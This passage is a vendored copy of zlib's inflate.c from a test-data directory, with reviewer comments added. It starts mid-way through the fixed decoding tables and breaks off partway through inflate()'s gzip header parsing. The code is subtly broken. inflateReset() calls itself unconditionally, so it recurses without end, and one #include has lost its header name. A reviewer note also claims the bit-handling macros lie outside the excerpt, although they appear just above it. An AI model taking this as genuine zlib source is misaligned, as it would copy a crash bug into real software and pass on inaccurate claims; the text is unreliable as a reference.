{0,9,166},{0,8,3},{0,8,131},{0,8,67},{0,9,230},{16,7,7},{0,8,91}, {0,8,27},{0,9,150},{20,7,67},{0,8,123},{0,8,59},{0,9,214},{18,7,19}, {0,8,107},{0,8,43},{0,9,182},{0,8,11},{0,8,139},{0,8,75},{0,9,246}, {16,7,5},{0,8,87},{0,8,23},{64,8,0},{19,7,51},{0,8,119},{0,8,55}, {0,9,206},{17,7,15},{0,8,103},{0,8,39},{0,9,174},{0,8,7},{0,8,135}, {0,8,71},{0,9,238},{16,7,9},{0,8,95},{0,8,31},{0,9,158},{20,7,99}, {0,8,127},{0,8,63},{0,9,222},{18,7,27},{0,8,111},{0,8,47},{0,9,190}, {0,8,15},{0,8,143},{0,8,79},{0,9,254},{96,7,0},{0,8,80},{0,8,16}, {20,8,115},{18,7,31},{0,8,112},{0,8,48},{0,9,193},{16,7,10},{0,8,96}, {0,8,32},{0,9,161},{0,8,0},{0,8,128},{0,8,64},{0,9,225},{16,7,6}, {0,8,88},{0,8,24},{0,9,145},{19,7,59},{0,8,120},{0,8,56},{0,9,209}, {17,7,17},{0,8,104},{0,8,40},{0,9,177},{0,8,8},{0,8,136},{0,8,72}, {0,9,241},{16,7,4},{0,8,84},{0,8,20},{21,8,227},{19,7,43},{0,8,116}, {0,8,52},{0,9,201},{17,7,13},{0,8,100},{0,8,36},{0,9,169},{0,8,4}, {0,8,132},{0,8,68},{0,9,233},{16,7,8},{0,8,92},{0,8,28},{0,9,153}, {20,7,83},{0,8,124},{0,8,60},{0,9,217},{18,7,23},{0,8,108},{0,8,44}, {0,9,185},{0,8,12},{0,8,140},{0,8,76},{0,9,249},{16,7,3},{0,8,82}, {0,8,18},{21,8,163},{19,7,35},{0,8,114},{0,8,50},{0,9,197},{17,7,11}, {0,8,98},{0,8,34},{0,9,165},{0,8,2},{0,8,130},{0,8,66},{0,9,229}, {16,7,7},{0,8,90},{0,8,26},{0,9,149},{20,7,67},{0,8,122},{0,8,58}, {0,9,213},{18,7,19},{0,8,106},{0,8,42},{0,9,181},{0,8,10},{0,8,138}, {0,8,74},{0,9,245},{16,7,5},{0,8,86},{0,8,22},{64,8,0},{19,7,51}, {0,8,118},{0,8,54},{0,9,205},{17,7,15},{0,8,102},{0,8,38},{0,9,173}, {0,8,6},{0,8,134},{0,8,70},{0,9,237},{16,7,9},{0,8,94},{0,8,30}, {0,9,157},{20,7,99},{0,8,126},{0,8,62},{0,9,221},{18,7,27},{0,8,110}, {0,8,46},{0,9,189},{0,8,14},{0,8,142},{0,8,78},{0,9,253},{96,7,0}, {0,8,81},{0,8,17},{21,8,131},{18,7,31},{0,8,113},{0,8,49},{0,9,195}, {16,7,10},{0,8,97},{0,8,33},{0,9,163},{0,8,1},{0,8,129},{0,8,65}, {0,9,227},{16,7,6},{0,8,89},{0,8,25},{0,9,147},{19,7,59},{0,8,121}, 
{0,8,57},{0,9,211},{17,7,17},{0,8,105},{0,8,41},{0,9,179},{0,8,9}, {0,8,137},{0,8,73},{0,9,243},{16,7,4},{0,8,85},{0,8,21},{16,8,258}, {19,7,43},{0,8,117},{0,8,53},{0,9,203},{17,7,13},{0,8,101},{0,8,37}, {0,9,171},{0,8,5},{0,8,133},{0,8,69},{0,9,235},{16,7,8},{0,8,93}, {0,8,29},{0,9,155},{20,7,83},{0,8,125},{0,8,61},{0,9,219},{18,7,23}, {0,8,109},{0,8,45},{0,9,187},{0,8,13},{0,8,141},{0,8,77},{0,9,251}, {16,7,3},{0,8,83},{0,8,19},{21,8,195},{19,7,35},{0,8,115},{0,8,51}, {0,9,199},{17,7,11},{0,8,99},{0,8,35},{0,9,167},{0,8,3},{0,8,131}, {0,8,67},{0,9,231},{16,7,7},{0,8,91},{0,8,27},{0,9,151},{20,7,67}, {0,8,123},{0,8,59},{0,9,215},{18,7,19},{0,8,107},{0,8,43},{0,9,183}, {0,8,11},{0,8,139},{0,8,75},{0,9,247},{16,7,5},{0,8,87},{0,8,23}, {64,8,0},{19,7,51},{0,8,119},{0,8,55},{0,9,207},{17,7,15},{0,8,103}, {0,8,39},{0,9,175},{0,8,7},{0,8,135},{0,8,71},{0,9,239},{16,7,9}, {0,8,95},{0,8,31},{0,9,159},{20,7,99},{0,8,127},{0,8,63},{0,9,223}, {18,7,27},{0,8,111},{0,8,47},{0,9,191},{0,8,15},{0,8,143},{0,8,79}, {0,9,255} }; static const code distfix[32] = { {16,5,1},{23,5,257},{19,5,17},{27,5,4097},{17,5,5},{25,5,1025}, {21,5,65},{29,5,16385},{16,5,3},{24,5,513},{20,5,33},{28,5,8193}, {18,5,9},{26,5,2049},{22,5,129},{64,5,0},{16,5,2},{23,5,385}, {19,5,25},{27,5,6145},{17,5,7},{25,5,1537},{21,5,97},{29,5,24577}, {16,5,4},{24,5,769},{20,5,49},{28,5,12289},{18,5,13},{26,5,3073}, {22,5,193},{64,5,0} }; ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/inflate.c ================================================ /* inflate.c -- zlib decompression * Copyright (C) 1995-2022 Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ /* * Change history: * * 1.2.beta0 24 Nov 2002 * - First version -- complete rewrite of inflate to simplify code, avoid * creation of window when not needed, minimize use of window when it is * needed, make inffast.c even faster, implement gzip decoding, and 
to * improve code readability and style over the previous zlib inflate code * * 1.2.beta1 25 Nov 2002 * - Use pointers for available input and output checking in inffast.c * - Remove input and output counters in inffast.c * - Change inffast.c entry and loop from avail_in >= 7 to >= 6 * - Remove unnecessary second byte pull from length extra in inffast.c * - Unroll direct copy to three copies per loop in inffast.c * * 1.2.beta2 4 Dec 2002 * - Change external routine names to reduce potential conflicts * - Correct filename to inffixed.h for fixed tables in inflate.c * - Make hbuf[] unsigned char to match parameter type in inflate.c * - Change strm->next_out[-state->offset] to *(strm->next_out - state->offset) * to avoid negation problem on Alphas (64 bit) in inflate.c * * 1.2.beta3 22 Dec 2002 * - Add comments on state->bits assertion in inffast.c * - Add comments on op field in inftrees.h * - Fix bug in reuse of allocated window after inflateReset() * - Remove bit fields--back to byte structure for speed * - Remove distance extra == 0 check in inflate_fast()--only helps for lengths * - Change post-increments to pre-increments in inflate_fast(), PPC biased? * - Add compile time option, POSTINC, to use post-increments instead (Intel?) 
* - Make MATCH copy in inflate() much faster for when inflate_fast() not used * - Use local copies of stream next and avail values, as well as local bit * buffer and bit count in inflate()--for speed when inflate_fast() not used * * 1.2.beta4 1 Jan 2003 * - Split ptr - 257 statements in inflate_table() to avoid compiler warnings * - Move a comment on output buffer sizes from inffast.c to inflate.c * - Add comments in inffast.c to introduce the inflate_fast() routine * - Rearrange window copies in inflate_fast() for speed and simplification * - Unroll last copy for window match in inflate_fast() * - Use local copies of window variables in inflate_fast() for speed * - Pull out common wnext == 0 case for speed in inflate_fast() * - Make op and len in inflate_fast() unsigned for consistency * - Add FAR to lcode and dcode declarations in inflate_fast() * - Simplified bad distance check in inflate_fast() * - Added inflateBackInit(), inflateBack(), and inflateBackEnd() in new * source file infback.c to provide a call-back interface to inflate for * programs like gzip and unzip -- uses window as output buffer to avoid * window copying * * 1.2.beta5 1 Jan 2003 * - Improved inflateBack() interface to allow the caller to provide initial * input in strm. 
* - Fixed stored blocks bug in inflateBack()
*
* 1.2.beta6 4 Jan 2003
* - Added comments in inffast.c on effectiveness of POSTINC
* - Typecasting all around to reduce compiler warnings
* - Changed loops from while (1) or do {} while (1) to for (;;), again to
*   make compilers happy
* - Changed type of window in inflateBackInit() to unsigned char *
*
* 1.2.beta7 27 Jan 2003
* - Changed many types to unsigned or unsigned short to avoid warnings
* - Added inflateCopy() function
*
* 1.2.0 9 Mar 2003
* - Changed inflateBack() interface to provide separate opaque descriptors
*   for the in() and out() functions
* - Changed inflateBack() argument and in_func typedef to swap the length
*   and buffer address return values for the input function
* - Check next_in and next_out for Z_NULL on entry to inflate()
*
* The history for versions after 1.2.0 are in ChangeLog in zlib distribution.
*/

#include "zutil.h"
#include "inftrees.h"
#include "inflate.h"
#include "inffast.h"

#ifdef MAKEFIXED
# ifndef BUILDFIXED
# define BUILDFIXED
# endif
#endif

/*
   Sanity-check a stream before any other routine touches its state.  Returns
   1 if strm is null, has no allocator or free function, has no state, has a
   state whose back-pointer does not refer to strm, or has a mode outside
   HEAD..SYNC.  Returns 0 otherwise.  The public entry points in this file
   call this first and return Z_STREAM_ERROR when it reports 1.
 */
local int inflateStateCheck(z_streamp strm) {
    struct inflate_state FAR *state;
    if (strm == Z_NULL ||
        strm->zalloc == (alloc_func)0 || strm->zfree == (free_func)0)
        return 1;
    state = (struct inflate_state FAR *)strm->state;
    /* state->strm is set to strm in inflateInit2_(); presumably this catches
       a z_stream that was copied by value or a foreign state -- confirm */
    if (state == Z_NULL || state->strm != strm ||
        state->mode < HEAD || state->mode > SYNC)
        return 1;
    return 0;
}

/*
   Reset the decoding state to the start of a stream without touching the
   window fields (wsize, whave, wnext).  Clears the totals, the message, the
   bit accumulator and the code table pointers, and sets mode to HEAD.
   Returns Z_STREAM_ERROR if the stream fails inflateStateCheck(), else Z_OK.
 */
int ZEXPORT inflateResetKeep(z_streamp strm) {
    struct inflate_state FAR *state;

    if (inflateStateCheck(strm)) return Z_STREAM_ERROR;
    state = (struct inflate_state FAR *)strm->state;
    strm->total_in = strm->total_out = state->total = 0;
    strm->msg = Z_NULL;
    if (state->wrap)        /* to support ill-conceived Java test suite */
        strm->adler = state->wrap & 1;
    state->mode = HEAD;
    state->last = 0;
    state->havedict = 0;
    state->flags = -1;
    state->dmax = 32768U;
    state->head = Z_NULL;
    state->hold = 0;
    state->bits = 0;
    state->lencode = state->distcode = state->next = state->codes;
    /* sane = 1 makes inflate_fast() reject a match distance that reaches
       before the valid window contents */
    state->sane = 1;
    state->back = -1;
    Tracev((stderr, "inflate: reset\n"));
    return Z_OK;
}

/*
   Full reset: zero the window bookkeeping (wsize, whave, wnext) and then do
   everything inflateResetKeep() does.  The window buffer itself is not freed
   here.  Returns Z_STREAM_ERROR for an invalid stream, else the result of
   inflateResetKeep().
 */
int ZEXPORT inflateReset(z_streamp strm) {
    struct inflate_state FAR *state;

    if (inflateStateCheck(strm)) return Z_STREAM_ERROR;
    state = (struct inflate_state FAR *)strm->state;
    state->wsize = 0;
    state->whave = 0;
    state->wnext = 0;
    return inflateReset(strm) == Z_STREAM_ERROR ? Z_STREAM_ERROR : inflateResetKeep(strm);
}

/*
   Reset the stream and change the window size / wrapper selection.
   windowBits is decoded as follows:
     - negative: wrap = 0 and the magnitude is the window size; values below
       -15 are rejected before the negation
     - otherwise: wrap = (windowBits >> 4) + 5 and, when GUNZIP is defined and
       windowBits < 48, only the low four bits are kept as the window size
   The resulting window size must be 0 or in 8..15, else Z_STREAM_ERROR.  An
   existing window of a different size is freed so that it is reallocated
   with the new size later.
 */
int ZEXPORT inflateReset2(z_streamp strm, int windowBits) {
    int wrap;
    struct inflate_state FAR *state;

    /* get the state */
    if (inflateStateCheck(strm)) return Z_STREAM_ERROR;
    state = (struct inflate_state FAR *)strm->state;

    /* extract wrap request from windowBits parameter */
    if (windowBits < 0) {
        if (windowBits < -15)
            return Z_STREAM_ERROR;
        wrap = 0;
        windowBits = -windowBits;
    }
    else {
        wrap = (windowBits >> 4) + 5;
#ifdef GUNZIP
        if (windowBits < 48)
            windowBits &= 15;
#endif
    }

    /* set number of window bits, free window if different */
    if (windowBits && (windowBits < 8 || windowBits > 15))
        return Z_STREAM_ERROR;
    if (state->window != Z_NULL && state->wbits != (unsigned)windowBits) {
        ZFREE(strm, state->window);
        state->window = Z_NULL;
    }

    /* update state and reset the rest of it */
    state->wrap = wrap;
    state->wbits = (unsigned)windowBits;
    return inflateReset(strm);
}

/*
   Allocate and initialise the inflate state for strm.
   Returns Z_VERSION_ERROR if version is null, its first character differs
   from ZLIB_VERSION's, or stream_size is not sizeof(z_stream);
   Z_STREAM_ERROR if strm is null (or, with Z_SOLO, if no allocator or free
   function was supplied); Z_MEM_ERROR if the state cannot be allocated;
   otherwise the result of inflateReset2().  On a failed reset the state is
   freed and strm->state is set back to Z_NULL, so no dangling pointer is
   left in the stream.
 */
int ZEXPORT inflateInit2_(z_streamp strm, int windowBits,
                          const char *version, int stream_size) {
    int ret;
    struct inflate_state FAR *state;

    if (version == Z_NULL || version[0] != ZLIB_VERSION[0] ||
        stream_size != (int)(sizeof(z_stream)))
        return Z_VERSION_ERROR;
    if (strm == Z_NULL) return Z_STREAM_ERROR;
    strm->msg = Z_NULL;                 /* in case we return an error */
    if (strm->zalloc == (alloc_func)0) {
#ifdef Z_SOLO
        return Z_STREAM_ERROR;
#else
        strm->zalloc = zcalloc;
        strm->opaque = (voidpf)0;
#endif
    }
    if (strm->zfree == (free_func)0)
#ifdef Z_SOLO
        return Z_STREAM_ERROR;
#else
        strm->zfree = zcfree;
#endif
    state = (struct inflate_state FAR *)
            ZALLOC(strm, 1, sizeof(struct inflate_state));
    if (state == Z_NULL) return Z_MEM_ERROR;
    Tracev((stderr, "inflate: allocated\n"));
    strm->state = (struct internal_state FAR *)state;
    state->strm = strm;
    state->window = Z_NULL;
    state->mode = HEAD;     /* to pass state test in inflateReset2() */
    ret = inflateReset2(strm, windowBits);
    if (ret != Z_OK) {
        ZFREE(strm, state);
        strm->state = Z_NULL;
    }
    return ret;
}

/* Initialise strm with the default window size; thin wrapper that passes
   DEF_WBITS to inflateInit2_(). */
int ZEXPORT inflateInit_(z_streamp strm, const char *version,
                         int stream_size) {
    return inflateInit2_(strm, DEF_WBITS, version, stream_size);
}

/*
   Insert bits into the bit accumulator ahead of the input stream.
     - bits == 0: nothing to do, returns Z_OK
     - bits < 0:  the accumulator is cleared, returns Z_OK
     - bits > 16, or more than 32 bits would then be held: Z_STREAM_ERROR
   value is masked to its low `bits` bits before it is added, so higher bits
   supplied by the caller are ignored.
 */
int ZEXPORT inflatePrime(z_streamp strm, int bits, int value) {
    struct inflate_state FAR *state;

    if (inflateStateCheck(strm)) return Z_STREAM_ERROR;
    if (bits == 0)
        return Z_OK;
    state = (struct inflate_state FAR *)strm->state;
    if (bits < 0) {
        state->hold = 0;
        state->bits = 0;
        return Z_OK;
    }
    if (bits > 16 || state->bits + (uInt)bits > 32) return Z_STREAM_ERROR;
    value &= (1L << bits) - 1;
    state->hold += (unsigned)value << state->bits;
    state->bits += (uInt)bits;
    return Z_OK;
}

/*
   Return state with length and distance decoding tables and index sizes set to
   fixed code decoding. Normally this returns fixed tables from inffixed.h.
   If BUILDFIXED is defined, then instead this routine builds the tables the
   first time it's called, and returns those tables the first time and
   thereafter. This reduces the size of the code by about 2K bytes, in
   exchange for a little execution time. However, BUILDFIXED should not be
   used for threaded applications, since the rewriting of the tables and virgin
   may not be thread-safe.
*/
/* Review note: in the BUILDFIXED branch the tables live in function-local
   statics guarded only by the plain int `virgin`; no lock or atomic is used,
   which is why the comment above warns against threaded use.  In the default
   branch lenfix and distfix come from the const arrays in inffixed.h. */
local void fixedtables(struct inflate_state FAR *state) {
#ifdef BUILDFIXED
    static int virgin = 1;
    static code *lenfix, *distfix;
    static code fixed[544];

    /* build fixed huffman tables if first call (may not be thread safe) */
    if (virgin) {
        unsigned sym, bits;
        static code *next;

        /* literal/length table */
        sym = 0;
        while (sym < 144) state->lens[sym++] = 8;
        while (sym < 256) state->lens[sym++] = 9;
        while (sym < 280) state->lens[sym++] = 7;
        while (sym < 288) state->lens[sym++] = 8;
        next = fixed;
        lenfix = next;
        bits = 9;
        inflate_table(LENS, state->lens, 288, &(next), &(bits), state->work);

        /* distance table */
        sym = 0;
        while (sym < 32) state->lens[sym++] = 5;
        /* the distance table is placed in fixed[] where inflate_table() left
           next after the literal/length table */
        distfix = next;
        bits = 5;
        inflate_table(DISTS, state->lens, 32, &(next), &(bits), state->work);

        /* do this just once */
        virgin = 0;
    }
#else /* !BUILDFIXED */
# include "inffixed.h"
#endif /* BUILDFIXED */
    state->lencode = lenfix;
    state->lenbits = 9;
    state->distcode = distfix;
    state->distbits = 5;
}

#ifdef MAKEFIXED
/* NOTE(review): the header name after the #include below is missing on this
   page, most likely lost in extraction.  makefixed() calls puts(), printf()
   and putchar(), so it is presumably <stdio.h> -- confirm against the
   upstream zlib source. */
#include

/*
   Write out the inffixed.h that is #include'd above. Defining MAKEFIXED also
   defines BUILDFIXED, so the tables are built on the fly. makefixed() writes
   those tables to stdout, which would be piped to inffixed.h. A small program
   can simply call makefixed to do this:

    void makefixed(void);

    int main(void)
    {
        makefixed();
        return 0;
    }

   Then that can be linked with zlib built with MAKEFIXED defined and run:

    a.out > inffixed.h
 */
void makefixed(void)
{
    unsigned low, size;
    /* only the fields that fixedtables() writes are used below; the rest of
       this stack object is left uninitialised */
    struct inflate_state state;

    fixedtables(&state);
    puts(" /* inffixed.h -- table for decoding fixed codes");
    puts(" * Generated automatically by makefixed().");
    puts(" */");
    puts("");
    puts(" /* WARNING: this file should *not* be used by applications.");
    puts(" It is part of the implementation of this library and is");
    puts(" subject to change. Applications should only use zlib.h.");
    puts(" */");
    puts("");
    size = 1U << 9;
    printf(" static const code lenfix[%u] = {", size);
    low = 0;
    for (;;) {
        if ((low % 7) == 0) printf("\n ");
        /* entries whose low seven index bits equal 99 are written with
           op = 64 instead of the op value stored in the built table */
        printf("{%u,%u,%d}", (low & 127) == 99 ? 64 : state.lencode[low].op,
               state.lencode[low].bits, state.lencode[low].val);
        if (++low == size) break;
        putchar(',');
    }
    puts("\n };");
    size = 1U << 5;
    printf("\n static const code distfix[%u] = {", size);
    low = 0;
    for (;;) {
        if ((low % 6) == 0) printf("\n ");
        printf("{%u,%u,%d}", state.distcode[low].op, state.distcode[low].bits,
               state.distcode[low].val);
        if (++low == size) break;
        putchar(',');
    }
    puts("\n };");
}
#endif /* MAKEFIXED */

/*
   Update the window with the last wsize (normally 32K) bytes written before
   returning. If window does not exist yet, create it. This is only called
   when a window is already in use, or when output has been written during this
   inflate call, but the end of the deflate stream has not been reached yet.
   It is also called to create a window for dictionary data when a dictionary
   is loaded.

   Providing output buffers larger than 32K to inflate() should provide a speed
   advantage, since only the last 32K of output is copied to the sliding window
   upon return from inflate(), and since all distances after the first 32K of
   output will fall in the output data, making match copies simpler and faster.
   The advantage may be dependent on the size of the processor's data caches.
*/
/* Parameters and return value, as used in the body below:
     strm  stream whose state holds the window
     end   pointer just past the most recent output; the bytes copied are
           read from end - copy (or end - wsize) up to end
     copy  number of bytes before end that are available to copy
   Returns 1 if the window could not be allocated, 0 otherwise.

   Review note: nothing in this function checks that `copy` bytes really
   precede `end`; presumably every caller passes the count of bytes it just
   wrote -- verify at the call sites.  All writes stay inside the window:
   each copy is limited to wsize, to wsize - wnext, or to the remainder after
   that. */
local int updatewindow(z_streamp strm, const Bytef *end, unsigned copy) {
    struct inflate_state FAR *state;
    unsigned dist;

    state = (struct inflate_state FAR *)strm->state;

    /* if it hasn't been done already, allocate space for the window */
    if (state->window == Z_NULL) {
        state->window = (unsigned char FAR *)
                        ZALLOC(strm, 1U << state->wbits,
                               sizeof(unsigned char));
        if (state->window == Z_NULL) return 1;
    }

    /* if window not in use yet, initialize */
    if (state->wsize == 0) {
        state->wsize = 1U << state->wbits;
        state->wnext = 0;
        state->whave = 0;
    }

    /* copy state->wsize or less output bytes into the circular window */
    if (copy >= state->wsize) {
        /* at least a full window of new output: keep only the last wsize
           bytes and restart the write index at 0 */
        zmemcpy(state->window, end - state->wsize, state->wsize);
        state->wnext = 0;
        state->whave = state->wsize;
    }
    else {
        /* dist = room left between the write index and the end of the window,
           capped at copy */
        dist = state->wsize - state->wnext;
        if (dist > copy) dist = copy;
        zmemcpy(state->window + state->wnext, end - copy, dist);
        copy -= dist;
        if (copy) {
            /* wrapped: the remainder goes to the start of the window */
            zmemcpy(state->window, end - copy, copy);
            state->wnext = copy;
            state->whave = state->wsize;
        }
        else {
            state->wnext += dist;
            if (state->wnext == state->wsize) state->wnext = 0;
            if (state->whave < state->wsize) state->whave += dist;
        }
    }
    return 0;
}

/* Macros for inflate(): */

/* check function to use adler32() for zlib or crc32() for gzip */
#ifdef GUNZIP
# define UPDATE_CHECK(check, buf, len) \
    (state->flags ? crc32(check, buf, len) : adler32(check, buf, len))
#else
# define UPDATE_CHECK(check, buf, len) adler32(check, buf, len)
#endif

/* check macros for header crc; both write the low bytes of word into the
   local hbuf[] (least significant byte first) and fold them into check */
#ifdef GUNZIP
# define CRC2(check, word) \
    do { \
        hbuf[0] = (unsigned char)(word); \
        hbuf[1] = (unsigned char)((word) >> 8); \
        check = crc32(check, hbuf, 2); \
    } while (0)

# define CRC4(check, word) \
    do { \
        hbuf[0] = (unsigned char)(word); \
        hbuf[1] = (unsigned char)((word) >> 8); \
        hbuf[2] = (unsigned char)((word) >> 16); \
        hbuf[3] = (unsigned char)((word) >> 24); \
        check = crc32(check, hbuf, 4); \
    } while (0)
#endif

/* Load registers with state in inflate() for speed */
#define LOAD() \
    do { \
        put = strm->next_out; \
        left = strm->avail_out; \
        next = strm->next_in; \
        have = strm->avail_in; \
        hold = state->hold; \
        bits = state->bits; \
    } while (0)

/* Restore state from registers in inflate() */
#define RESTORE() \
    do { \
        strm->next_out = put; \
        strm->avail_out = left; \
        strm->next_in = next; \
        strm->avail_in = have; \
        state->hold = hold; \
        state->bits = bits; \
    } while (0)

/* Clear the input bit accumulator */
#define INITBITS() \
    do { \
        hold = 0; \
        bits = 0; \
    } while (0)

/* Get a byte of input into the bit accumulator, or return from inflate()
   if there is no input available.  The have == 0 test comes before the read
   of *next, so this macro never reads past the input that was supplied. */
#define PULLBYTE() \
    do { \
        if (have == 0) goto inf_leave; \
        have--; \
        hold += (unsigned long)(*next++) << bits; \
        bits += 8; \
    } while (0)

/* Assure that there are at least n bits in the bit accumulator. If there is
   not enough available input to do that, then return from inflate(). */
#define NEEDBITS(n) \
    do { \
        while (bits < (unsigned)(n)) \
            PULLBYTE(); \
    } while (0)

/* Return the low n bits of the bit accumulator (n < 16) */
#define BITS(n) \
    ((unsigned)hold & ((1U << (n)) - 1))

/* Remove n bits from the bit accumulator */
#define DROPBITS(n) \
    do { \
        hold >>= (n); \
        bits -= (unsigned)(n); \
    } while (0)

/* Remove zero to seven bits as needed to go to a byte boundary */
#define BYTEBITS() \
    do { \
        hold >>= bits & 7; \
        bits -= bits & 7; \
    } while (0)

/*
   inflate() uses a state machine to process as much input data and generate as
   much output data as possible before returning. The state machine is
   structured roughly as follows:

    for (;;) switch (state) {
    ...
    case STATEn:
        if (not enough input data or output space to make progress)
            return;
        ... make progress ...
        state = STATEm;
        break;
    ...
    }

   so when inflate() is called again, the same case is attempted again, and
   if the appropriate resources are provided, the machine proceeds to the
   next state. The NEEDBITS() macro is usually the way the state evaluates
   whether it can proceed or should return. NEEDBITS() does the return if
   the requested bits are not available. The typical use of the BITS macros
   is:

        NEEDBITS(n);
        ... do something with BITS(n) ...
        DROPBITS(n);

   where NEEDBITS(n) either returns from inflate() if there isn't enough
   input left to load n bits into the accumulator, or it continues. BITS(n)
   gives the low n bits in the accumulator. When done, DROPBITS(n) drops
   the low n bits off the accumulator. INITBITS() clears the accumulator
   and sets the number of available bits to zero. BYTEBITS() discards just
   enough bits to put the accumulator on a byte boundary. After BYTEBITS()
   and a NEEDBITS(8), then BITS(8) would return the next byte in the stream.

   NEEDBITS(n) uses PULLBYTE() to get an available byte of input, or to return
   if there is no input available. The decoding of variable length codes uses
   PULLBYTE() directly in order to pull just enough bytes to decode the next
   code, and no more.
Some states loop until they get enough input, making sure that enough state information is maintained to continue the loop where it left off if NEEDBITS() returns in the loop. For example, want, need, and keep would all have to actually be part of the saved state in case NEEDBITS() returns: case STATEw: while (want < need) { NEEDBITS(n); keep[want++] = BITS(n); DROPBITS(n); } state = STATEx; case STATEx: As shown above, if the next state is also the next case, then the break is omitted. A state may also return if there is not enough output space available to complete that state. Those states are copying stored data, writing a literal byte, and copying a matching string. When returning, a "goto inf_leave" is used to update the total counters, update the check value, and determine whether any progress has been made during that inflate() call in order to return the proper return code. Progress is defined as a change in either strm->avail_in or strm->avail_out. When there is a window, goto inf_leave will update the window with the last output written. If a goto inf_leave occurs in the middle of decompression and there is no window currently, goto inf_leave will create one and copy output to the window for the next call of inflate(). In this implementation, the flush parameter of inflate() only affects the return code (per zlib.h). inflate() always writes as much as possible to strm->next_out, given the space available and the provided input--the effect documented in zlib.h of Z_SYNC_FLUSH. Furthermore, inflate() always defers the allocation of and copying into a sliding window until necessary, which provides the effect documented in zlib.h for Z_FINISH when the entire input stream available. So the only thing the flush parameter actually does is: when flush is set to Z_FINISH, inflate() cannot return Z_OK. Instead it will return Z_BUF_ERROR if it has not reached the end of the stream. 
*/
/*
   Reviewer summary of inflate() as written below.

   - The call is rejected with Z_STREAM_ERROR when inflateStateCheck() fails,
     when next_out is Z_NULL, or when next_in is Z_NULL while avail_in is
     nonzero.
   - The body is a switch on state->mode inside for (;;).  Every branch that
     detects malformed input sets strm->msg and moves to BAD; the BAD case
     returns Z_DATA_ERROR through inf_leave.
   - Other returns visible here: Z_STREAM_END (DONE), Z_NEED_DICT (DICT with
     no dictionary set), Z_MEM_ERROR (MEM, or updatewindow() failing),
     Z_STREAM_ERROR (SYNC or an unknown mode), and Z_BUF_ERROR when ret is
     still Z_OK and either nothing was consumed or produced or flush is
     Z_FINISH.
   - LOAD, RESTORE, INITBITS, NEEDBITS, PULLBYTE, BITS, DROPBITS, BYTEBITS,
     CRC2, CRC4 and UPDATE_CHECK are defined earlier in this file, outside
     this excerpt.  NOTE(review): NEEDBITS/PULLBYTE presumably leave through
     inf_leave when input runs out -- confirm against their definitions.
 */
int ZEXPORT inflate(z_streamp strm, int flush) {
    struct inflate_state FAR *state;
    z_const unsigned char FAR *next;    /* next input */
    unsigned char FAR *put;     /* next output */
    unsigned have, left;        /* available input and output */
    unsigned long hold;         /* bit buffer */
    unsigned bits;              /* bits in bit buffer */
    unsigned in, out;           /* save starting available input and output */
    unsigned copy;              /* number of stored or match bytes to copy */
    unsigned char FAR *from;    /* where to copy match bytes from */
    code here;                  /* current decoding table entry */
    code last;                  /* parent table entry */
    unsigned len;               /* length to copy for repeats, bits to drop */
    int ret;                    /* return code */
#ifdef GUNZIP
    unsigned char hbuf[4];      /* buffer for gzip header crc calculation */
#endif
    static const unsigned short order[19] = /* permutation of code lengths */
        {16, 17, 18, 0, 8, 7, 9, 6, 10, 5, 11, 4, 12, 3, 13, 2, 14, 1, 15};

    if (inflateStateCheck(strm) || strm->next_out == Z_NULL ||
        (strm->next_in == Z_NULL && strm->avail_in != 0))
        return Z_STREAM_ERROR;

    state = (struct inflate_state FAR *)strm->state;
    if (state->mode == TYPE) state->mode = TYPEDO;      /* skip check */
    LOAD();
    in = have;
    out = left;
    ret = Z_OK;
    for (;;)
        switch (state->mode) {
        case HEAD:
            if (state->wrap == 0) {
                state->mode = TYPEDO;
                break;
            }
            NEEDBITS(16);
#ifdef GUNZIP
            if ((state->wrap & 2) && hold == 0x8b1f) {  /* gzip header */
                if (state->wbits == 0)
                    state->wbits = 15;
                state->check = crc32(0L, Z_NULL, 0);
                CRC2(state->check, hold);
                INITBITS();
                state->mode = FLAGS;
                break;
            }
            if (state->head != Z_NULL)
                state->head->done = -1;
            if (!(state->wrap & 1) ||   /* check if zlib header allowed */
#else
            if (
#endif
                ((BITS(8) << 8) + (hold >> 8)) % 31) {
                strm->msg = (char *)"incorrect header check";
                state->mode = BAD;
                break;
            }
            if (BITS(4) != Z_DEFLATED) {
                strm->msg = (char *)"unknown compression method";
                state->mode = BAD;
                break;
            }
            DROPBITS(4);
            len = BITS(4) + 8;
            if (state->wbits == 0)
                state->wbits = len;
            /* the window size announced by the stream may not exceed 15 bits
               or the window size recorded in state->wbits */
            if (len > 15 || len > state->wbits) {
                strm->msg = (char *)"invalid window size";
                state->mode = BAD;
                break;
            }
            state->dmax = 1U << len;
            state->flags = 0;               /* indicate zlib header */
            Tracev((stderr, "inflate: zlib header ok\n"));
            strm->adler = state->check = adler32(0L, Z_NULL, 0);
            state->mode = hold & 0x200 ? DICTID : TYPE;
            INITBITS();
            break;
#ifdef GUNZIP
        case FLAGS:
            NEEDBITS(16);
            state->flags = (int)(hold);
            if ((state->flags & 0xff) != Z_DEFLATED) {
                strm->msg = (char *)"unknown compression method";
                state->mode = BAD;
                break;
            }
            if (state->flags & 0xe000) {
                strm->msg = (char *)"unknown header flags set";
                state->mode = BAD;
                break;
            }
            if (state->head != Z_NULL)
                state->head->text = (int)((hold >> 8) & 1);
            /* the header crc is accumulated only when the header announces
               one (0x0200) and validation is enabled (wrap bit 2) */
            if ((state->flags & 0x0200) && (state->wrap & 4))
                CRC2(state->check, hold);
            INITBITS();
            state->mode = TIME;
                /* fallthrough */
        case TIME:
            NEEDBITS(32);
            if (state->head != Z_NULL)
                state->head->time = hold;
            if ((state->flags & 0x0200) && (state->wrap & 4))
                CRC4(state->check, hold);
            INITBITS();
            state->mode = OS;
                /* fallthrough */
        case OS:
            NEEDBITS(16);
            if (state->head != Z_NULL) {
                state->head->xflags = (int)(hold & 0xff);
                state->head->os = (int)(hold >> 8);
            }
            if ((state->flags & 0x0200) && (state->wrap & 4))
                CRC2(state->check, hold);
            INITBITS();
            state->mode = EXLEN;
                /* fallthrough */
        case EXLEN:
            if (state->flags & 0x0400) {
                NEEDBITS(16);
                state->length = (unsigned)(hold);
                if (state->head != Z_NULL)
                    state->head->extra_len = (unsigned)hold;
                if ((state->flags & 0x0200) && (state->wrap & 4))
                    CRC2(state->check, hold);
                INITBITS();
            }
            else if (state->head != Z_NULL)
                state->head->extra = Z_NULL;
            state->mode = EXTRA;
                /* fallthrough */
        case EXTRA:
            if (state->flags & 0x0400) {
                copy = state->length;
                if (copy > have) copy = have;
